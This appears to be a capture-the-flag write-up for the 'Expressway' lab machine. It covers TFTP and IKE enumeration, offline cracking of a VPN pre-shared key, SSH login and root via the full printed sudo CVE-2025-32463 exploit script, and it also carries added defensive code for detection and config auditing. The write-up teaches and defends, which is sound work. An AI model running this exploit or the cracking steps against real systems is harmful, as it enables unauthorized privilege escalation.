🚀 Expressway
Enumeration
🔍 1. Initial Setup
Started by adding the target to our hosts file for easy reference:
```bash
echo "10.129.242.197 expressway.htb" | sudo tee -a /etc/hosts
```
🔍 2. Nmap Port Scan
Performed a comprehensive scan to identify running services:
```bash
nmap -Pn -A 10.129.242.197
```
| Port | Service | Version | Notes |
|---|---|---|---|
| 22/tcp | SSH | OpenSSH 10.0p2 Debian 8 | Standard SSH service |
| 69/udp | TFTP | Netkit tftpd/atftpd | File transfer service |
| 500/udp | IKE | PSK + XAUTH | IPsec key exchange |
| 4500/udp | NAT-T | IPsec NAT traversal | VPN support |
🔐 3. IKE Aggressive Mode Probe
Discovered the VPN identity and authentication method:
```bash
sudo ike-scan -A --id 'ike@expressway.htb' --idtype 3 10.129.242.197
```
- Identity: ike@expressway.htb
- Authentication: PSK (Pre-Shared Key)
- XAUTH support enabled
- Encryption: 3DES, Hash: SHA1, Group: modp1024
📁 4. TFTP File Discovery
Used Nmap's TFTP enumeration script to discover available files:
```bash
sudo nmap -sU -p 69 --script tftp-enum -Pn 10.129.242.197
```
Found a Cisco router configuration file: ciscortr.cfg
```
tftp 10.129.242.197
tftp> mode binary
tftp> get ciscortr.cfg ciscortr.cfg
tftp> quit
```
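The tftp-enum script above works by sending TFTP Read Requests (RRQ) for candidate filenames and seeing which ones the server answers. The same packet layout is what a defender sees on the wire, so the following added example (not part of the writeup) parses RRQ/WRQ payloads as defined in RFC 1350 and flags reads that look like device-configuration downloads. The sample packets and the suffix list are constructed for illustration.

```python
import struct

# TFTP opcodes (RFC 1350)
OPCODES = {1: "RRQ", 2: "WRQ", 3: "DATA", 4: "ACK", 5: "ERROR"}

# Filename endings that suggest a network-device configuration is being pulled.
# Constructed list; extend it to match the gear on your own network.
SENSITIVE_SUFFIXES = (".cfg", ".conf", "-confg", "running-config", "startup-config")


def parse_tftp_request(payload: bytes) -> dict:
    """Parse a TFTP payload laid out as opcode(2) | filename | 0 | mode | 0 [| options]."""
    if len(payload) < 4:
        raise ValueError("payload too short for a TFTP header")
    opcode = struct.unpack("!H", payload[:2])[0]
    if opcode not in (1, 2):
        # DATA/ACK/ERROR carry no filename; report the opcode only.
        return {"opcode": OPCODES.get(opcode, opcode), "filename": None, "mode": None, "options": {}}
    fields = payload[2:].split(b"\x00")
    # A well-formed request ends with a NUL, so the last split element is empty.
    if len(fields) < 3 or fields[-1] != b"":
        raise ValueError("malformed RRQ/WRQ: missing NUL terminator")
    filename = fields[0].decode("ascii", errors="replace")
    mode = fields[1].decode("ascii", errors="replace").lower()
    if mode not in ("netascii", "octet", "mail"):
        raise ValueError(f"unknown transfer mode {mode!r}")
    # RFC 2347 options follow the mode as name/value pairs.
    opts = fields[2:-1]
    pairs = zip(opts[0::2], opts[1::2]) if len(opts) % 2 == 0 else []
    options = {k.decode(errors="replace"): v.decode(errors="replace") for k, v in pairs}
    return {"opcode": OPCODES[opcode], "filename": filename, "mode": mode, "options": options}


def is_config_fetch(req: dict) -> bool:
    """True when a read request targets something that looks like a device config."""
    name = (req.get("filename") or "").lower()
    return req.get("opcode") == "RRQ" and name.endswith(SENSITIVE_SUFFIXES)


def build_request(opcode: int, filename: str, mode: str = "octet") -> bytes:
    """Encode an RRQ/WRQ; used here only to build the constructed sample packets."""
    return struct.pack("!H", opcode) + filename.encode() + b"\x00" + mode.encode() + b"\x00"


# Constructed sample traffic, not packets captured from the target.
SAMPLES = [
    build_request(1, "ciscortr.cfg"),
    build_request(1, "firmware.bin"),
    build_request(2, "upload.txt", "netascii"),
    build_request(1, "startup-config"),
    b"\x00\x01junk",  # truncated request, should be skipped rather than crash the loop
]


def flag_config_fetches(packets) -> list:
    """Return the filenames of RRQs that look like configuration downloads."""
    hits = []
    for pkt in packets:
        try:
            req = parse_tftp_request(pkt)
        except ValueError:
            continue  # malformed or non-request packet
        if is_config_fetch(req):
            hits.append(req["filename"])
    return hits


if __name__ == "__main__":
    for name in flag_config_fetches(SAMPLES):
        print(f"config read request observed: {name}")
```

Feeding this the UDP/69 payloads from a capture gives a quick answer to "who has been pulling configs from this server"; a burst of RRQs for many different filenames from one host is the enumeration pattern shown in this section.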
📝 5. Configuration Analysis
The Cisco configuration file revealed critical VPN settings:
- VPN Group: rtr-remote with key secret-password
- EZVPN Config: group 2 key secret-password
- Domain: expressway.htb
- Username: ike (password redacted in config)
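Everything the writeup pulled from ciscortr.cfg is the kind of finding a config audit should catch before the file is ever exposed. The following added example (not from the writeup) is a small line-based auditor for Cisco IOS-style configs: it flags cleartext ISAKMP/EZVPN group keys, reversible type 0/7 passwords, SNMP community strings and weak IKE policy settings, and redacts secrets in its own output. The sample config is constructed for illustration; it reuses the group and domain names from the writeup but is not the retrieved file.

```python
import re

# Constructed sample in IOS syntax, not the ciscortr.cfg from the box.
SAMPLE_CONFIG = """\
hostname rtr
!
enable secret 5 $1$abcd$EXAMPLEHASHPLACEHOLDER
username ike password 7 0123456789ABCDEF
username admin secret 9 $9$EXAMPLE$PLACEHOLDERHASH
!
crypto isakmp policy 10
 encr 3des
 hash sha
 authentication pre-share
 group 2
crypto isakmp client configuration group rtr-remote
 key secret-password
 domain expressway.htb
!
snmp-server community public RO
"""

# Each check: a regex applied per line (group 1 = the sensitive value), a severity, a rationale.
CHECKS = [
    (re.compile(r"^\s*key\s+(\S+)"), "high",
     "EZVPN/ISAKMP group key stored in cleartext; anyone who reads the config has the PSK"),
    (re.compile(r"^\s*crypto isakmp key\s+(\S+)"), "high",
     "ISAKMP pre-shared key stored in cleartext"),
    (re.compile(r"^\s*username\s+\S+\s+password\s+(?:7\s+)?(\S+)"), "high",
     "username with type 0/7 password; type 7 is reversible, use 'secret' (type 8/9)"),
    (re.compile(r"^\s*enable password\s+(\S+)"), "high",
     "enable password is type 0/7; use 'enable secret'"),
    (re.compile(r"^\s*enable secret\s+5\s+(\S+)"), "medium",
     "enable secret uses type 5 (MD5); prefer type 8 or 9"),
    (re.compile(r"^\s*snmp-server community\s+(\S+)"), "medium",
     "SNMP community string in config"),
    (re.compile(r"^\s*encr(?:yption)?\s+(3des|des)\b"), "medium",
     "ISAKMP policy uses a weak cipher"),
    (re.compile(r"^\s*group\s+(1|2)\b"), "medium",
     "ISAKMP policy uses DH group 1/2 (modp768/modp1024), below current minimums"),
]


def audit_config(text: str) -> list:
    """Scan a Cisco-style config; return (line_no, severity, rationale, line) tuples."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for pattern, severity, why in CHECKS:
            m = pattern.match(line)
            if m:
                # Redact credentials so the audit report itself is not a secret dump.
                shown = line.replace(m.group(1), "<redacted>") if severity == "high" else line
                findings.append((lineno, severity, why, shown.strip()))
                break  # one finding per line is enough
    return findings


def high_findings(text: str) -> int:
    """Count of findings that expose a usable credential."""
    return sum(1 for f in audit_config(text) if f[1] == "high")


if __name__ == "__main__":
    for lineno, sev, why, line in audit_config(SAMPLE_CONFIG):
        print(f"[{sev:6}] line {lineno}: {line}  # {why}")
```

Run against real backups this will also surface the "group 2" and 3DES/SHA1 settings that ike-scan reported in section 3; those are visible to anyone who can complete an IKE exchange, but the group key on line 13 is only recoverable if the file leaks, which is what the open TFTP server made possible here.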
Initial Access
🔓 6. PSK Cracking Setup
Generated a PSK crack file using IKE aggressive mode:
```bash
sudo ike-scan -A --id 'ike@expressway.htb' --idtype 3 --pskcrack=psk.bin 10.129.242.197
```
This created a psk.bin file containing the handshake data needed for offline cracking.
💥 7. Offline PSK Cracking
Used psk-crack with rockyou.txt wordlist:
```bash
psk-crack -v -d /usr/share/wordlists/rockyou.txt psk.bin
```
```
freakingrockstarontheroad
Iterations: 8,045,040 in 9.312 seconds (863,945.15 iterations/sec)
```
🚪 8. SSH Access
With the recovered PSK, attempted SSH login as user 'ike':
```bash
ssh ike@10.129.242.197
```
Successfully authenticated using the PSK as the password!
```
ike@expressway:~$ ls
user.txt
ike@expressway:~$ cat user.txt
[USER FLAG RETRIEVED]
```
Privilege Escalation
🔍 9. System Enumeration
Started by checking user privileges and system information:
```
ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
ike@expressway:~$ sudo -l
Sorry, user ike may not run sudo on expressway
```
🔍 10. Sudo Version Check
Checked the sudo version for known vulnerabilities:
```
ike@expressway:~$ sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
```
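Matching a sudo version against known advisories by eye is error-prone because sudo uses a "p" suffix for point releases (1.9.17p1 is newer than 1.9.17). The following added example (not from the writeup) parses the `sudo --version` banner into a comparable tuple and checks it against the published vulnerable ranges for the two 2025 sudo CVEs: CVE-2025-32462 (the `--host` policy bypass, sudo 1.8.8 through 1.9.17) and CVE-2025-32463 (the `--chroot` issue used later in this writeup, sudo 1.9.14 through 1.9.17), both fixed in 1.9.17p1. The ranges are taken from the upstream fix announcement as understood at time of writing; the sample banner is constructed to mirror the output shape shown above.

```python
import re

# Vulnerable ranges: first affected version (inclusive) and first fixed version (exclusive).
ADVISORIES = {
    "CVE-2025-32462": {"first": (1, 8, 8, 0), "fixed": (1, 9, 17, 1)},   # -h/--host policy bypass
    "CVE-2025-32463": {"first": (1, 9, 14, 0), "fixed": (1, 9, 17, 1)},  # -R/--chroot (chwoot)
}

# Matches "Sudo version 1.9.17" and "Sudo version 1.9.17p1".
VERSION_RE = re.compile(r"Sudo version\s+(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(output: str) -> tuple:
    """Turn the `sudo --version` banner into (major, minor, patch, p) for tuple comparison."""
    m = VERSION_RE.search(output)
    if not m:
        raise ValueError("no 'Sudo version X.Y.Z' line found")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def vulnerable_cves(version: tuple) -> list:
    """Return the CVE ids whose vulnerable range contains this version."""
    return [cve for cve, r in ADVISORIES.items() if r["first"] <= version < r["fixed"]]


def check_sudo(output: str) -> list:
    """Convenience wrapper: banner text in, list of applicable CVE ids out."""
    return vulnerable_cves(parse_sudo_version(output))


# Constructed sample mirroring the banner shape from the writeup.
SAMPLE_OUTPUT = """\
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
"""

if __name__ == "__main__":
    import subprocess
    try:
        out = subprocess.run(["sudo", "--version"], capture_output=True, text=True, check=False).stdout
    except FileNotFoundError:
        out = SAMPLE_OUTPUT  # no sudo binary on this host; demonstrate on the sample
    hits = check_sudo(out)
    print("vulnerable to: " + ", ".join(hits) if hits else "sudo version not in a listed vulnerable range")
```

One caveat for real fleets: distributions often backport the fix without changing the upstream version string, so a hit from this check means "verify the package changelog", not "confirmed vulnerable". On the box in this writeup the version really was an unpatched 1.9.17.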
💀 11. CVE-2025-32463 Exploitation
Created and executed an exploit script for the sudo vulnerability (the PoC header and the `sudo -R` chroot option identify it as CVE-2025-32463, "chwoot"):
```bash
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

# Shared object whose constructor drops into a root shell when loaded
cat > woot1337.c<<EOF
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

# Fake chroot with its own nsswitch.conf pointing at the module above
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc

gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot

rm -rf ${STAGE?}
```
👑 12. Root Access
Executed the exploit and gained root privileges:
```
ike@expressway:~$ ./exploit.sh
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
root@expressway:/# cd /root
root@expressway:/root# ls
root.txt
root@expressway:/root# cat root.txt
[ROOT FLAG RETRIEVED]
```
Attack Chain Summary
This writeup demonstrated a straightforward attack path leveraging network service vulnerabilities and a recent sudo privilege escalation:
TFTP File Discovery
→ Cisco Configuration Analysis
→ IKE Aggressive Mode PSK Extraction
→ Offline PSK Cracking
→ SSH Access as 'ike'
→ CVE-2025-32463 Sudo Exploitation
→ Root Privilege Escalation
Key Techniques Demonstrated
- TFTP Enumeration: Discovering exposed configuration files
- IKE Aggressive Mode Attack: Extracting PSK handshake for offline cracking
- Offline Password Cracking: Using wordlist attacks against network protocols
- Configuration Analysis: Mining sensitive information from network device configs
- CVE Exploitation: Leveraging recent sudo vulnerabilities for privilege escalation
Tools Used
- Nmap: Network reconnaissance and UDP service enumeration
- ike-scan: IKE aggressive mode probing and PSK extraction
- psk-crack: Offline pre-shared key cracking
- TFTP Client: File retrieval from TFTP service
- SSH: Remote shell access
- GCC: Compiling exploit code for privilege escalation
Critical Vulnerabilities Exploited
- Exposed TFTP Service: Sensitive configuration files accessible without authentication
- IKE Aggressive Mode: PSK vulnerable to offline dictionary attacks
- Weak PSK: Pre-shared key found in common wordlists
- Password Reuse: VPN PSK used as SSH password
- CVE-2025-32463: Sudo privilege escalation vulnerability (chroot option, unpatched 1.9.17)
Mitigations
- Disable or secure TFTP services - use SFTP or SCP for file transfers
- Avoid IKE Aggressive Mode - use Main Mode for VPN configurations
- Implement strong, unique pre-shared keys that resist dictionary attacks
- Avoid password reuse across different services and protocols
- Keep sudo updated and monitor for privilege escalation vulnerabilities
- Implement network segmentation to limit service exposure